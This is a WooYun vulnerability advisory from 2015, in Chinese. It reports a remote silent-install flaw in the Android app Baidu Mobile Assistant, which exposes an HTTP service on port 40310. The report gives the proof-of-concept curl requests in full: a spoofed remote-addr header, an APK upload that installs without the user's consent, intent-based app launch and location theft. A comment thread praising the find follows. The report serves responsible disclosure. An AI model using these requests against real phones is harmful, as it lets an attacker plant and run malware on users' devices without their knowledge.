当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145718

漏洞标题:百度手机助手远程静默安装启动应用漏洞(3G/4G环境下远程种马)

相关厂商:百度

漏洞作者: 瘦蛟舞

提交时间:2015-10-10 11:25

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

漏洞承接自http://www.wooyun.org/bugs/wooyun-2015-0145365

详细说明:

» droidport
Package Proto Recv-Q Send-Q Local Address Foreign Address State
com.baidu.appsearch tcp6 0 0 :::40310 :::* LISTEN
com.baidu.appsearch tcp6 0 0 :::7777 :::* LISTEN


发现百度手机助手监听40310这么奇怪的端口,这里7777先按下不表.
前面的分析和 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 差不多根据端口号找到 nano http server 的实现

40310.png


但是和之前不一样的是多了一些验证,比如 http 头部remote-addr字段的验证

addr.png


因为之前分析过百度输入法的 http server 所以很多结果就可以直接使用,比如获取目标坐标/IMEI/安装应用/远程发送 intent 等

func.png


获取坐标,其他信息获取可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标)

GET /geolocation?callback=012&mcmdf=inapp_aa HTTP/1.1
Host: 192.168.1.102:40310
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.baidu.com/
remote-addr: 127.0.0.1
Connection: keep-alive


但是其中又多了一些让人感兴趣的接口,比如uploadfile听着向上传文件,追踪下此调用类的实现看看到底在干什么.

upload.png


从代码中可以看出这是这个接收文件的操作,和类的命令很一直了.但是继续跟踪其对install_type操作判断后的处理会发现.还有一个令人虎躯一震的功能 静默安装. (一般手机助手都会有一个静默安装功能是需要 root 权限的,这样可以帮助用户省去点击安装的操作.)

install.png


我们是否可以利用这个功能达到远程恶意安装应用的目的了而且加上远程发送 intent 的功能,不仅定向安装了应用而且攻击者可以随时随地启动应用.

漏洞证明:

远程上传静默安装应用
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/uploadfile?install_type=all&callback=123&mcmdf=inapp_123&Filename=1.apk&
远程启动应用
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent:#Intent;component=org.wooyun.wifikey/org.wooyun.wifikey.MainActivity;end;&
urlencode
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent%3A%23Intent%3Bcomponent%3Dorg.wooyun.wifikey%2forg.wooyun.wifikey.MainActivity%3Bend%3B&
关于对 3/4G 网络扫描攻击可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 以及小荷才露尖尖角的文章http://drops.wooyun.org/mobile/6973.等俺有测试卡了俺就扩大范围测测,嘿嘿.

注意视频中 wifikey 是 curl 后突然冒出来并启动的哟~

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-10 11:50

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-10 11:27 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    好久没看瘦师傅发力了

  2. 2015-10-10 11:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:267 漏洞数:20 | 当我又回首一切,这个世界会好吗?)

    @梧桐雨 路人甲是你师父?

  3. 2015-10-10 11:35 | phith0n 认证白帽子 ( 普通白帽子 | Rank:718 漏洞数:114 | 一个想当文人的黑客~)

    @xsser 咦,不是瘦师傅发的么!!

  4. 2015-10-10 11:36 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    @xsser 这也行?!

  5. 2015-10-10 11:40 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    马克啊

  6. 2015-10-10 11:44 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    以后不能说蜂窝网络里面就是安全的了

  7. 2015-10-10 11:48 | boooooom 认证白帽子 ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)

    屌的飞起!

  8. 2015-10-10 11:49 | DNS ( 普通白帽子 | Rank:696 漏洞数:73 | root@qisec.com)

    卧槽 前排

  9. 2015-10-10 11:49 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2942 漏洞数:582 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    屌的起飞!

  10. 2015-10-10 11:50 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1278 漏洞数:128 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    真叼

  11. 2015-10-10 12:26 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)

    卧槽还能转路人甲?!

  12. 2015-10-10 12:46 | luwikes ( 普通白帽子 | Rank:532 漏洞数:79 | 潜心学习~~~)

    请问像师傅这么叼的,还有朋友吗?^-^

  13. 2015-10-10 13:17 | secmap ( 普通白帽子 | Rank:1293 漏洞数:200 )

    so屌...

  14. 2015-10-10 13:41 | 小荷才露尖尖角 ( 普通白帽子 | Rank:111 漏洞数:14 | less is more)

    瘦瘦发力了!

  15. 2015-10-10 14:01 | 数据流 认证白帽子 ( 普通白帽子 | Rank:738 漏洞数:93 | 没关系啊,我们还有音乐)

    关注!

  16. 2015-10-10 14:22 | onpu ( 普通白帽子 | Rank:167 漏洞数:37 | 勿忘初心)

    犀利

  17. 2015-10-10 14:25 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    大V们都冒出来了

  18. 2015-10-10 14:28 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  19. 2015-10-10 14:34 | 梧桐树下 ( 普通白帽子 | Rank:553 漏洞数:89 | 一大波洞正在过来……)

    爽翻!

  20. 2015-10-10 14:58 | 小不点 ( 核心白帽子 | Rank:1123 漏洞数:119 | 生命不息,刷洞不止.....)

    mark

  21. 2015-10-10 15:14 | 胡小树 ( 实习白帽子 | Rank:66 漏洞数:13 | 我是一颗小小树)

    @啊L川 乌云的短消息提示大贴心了,只要关注就行了

  22. 2015-10-10 15:20 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    屌炸天

  23. 2015-10-10 16:15 | 封停 ( 实习白帽子 | Rank:38 漏洞数:8 | 求老中医指路)

    屌的飞起~

  24. 2015-10-11 15:27 | scanf ( 核心白帽子 | Rank:1334 漏洞数:195 | 。)

    以后不能说蜂窝网络里面就是安全的了

  25. 2015-10-13 14:22 | 番茄师傅 ( 普通白帽子 | Rank:346 漏洞数:92 | http://www.tomatoyu.com/)

    以后不能说蜂窝网络里面就是安全的了

  26. 2015-10-13 15:44 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    马克

  27. 2015-10-13 16:57 | Comer ( 普通白帽子 | Rank:336 漏洞数:40 | 关注安全 | 关注智能漏洞挖掘)

    尼玛

  28. 2015-10-15 10:17 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)

    叼,关注乌云微信,安全生活每一天。

  29. 2015-10-27 23:02 | 指尖的温度 ( 路人 | Rank:27 漏洞数:10 )

    哎呀wocaowocao,丧(gan)心(de)病(piao)狂(liang)

  30. 2016-01-12 11:45 | 这只猪 ( 路人 | Rank:8 漏洞数:5 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)

    diao的不要不要的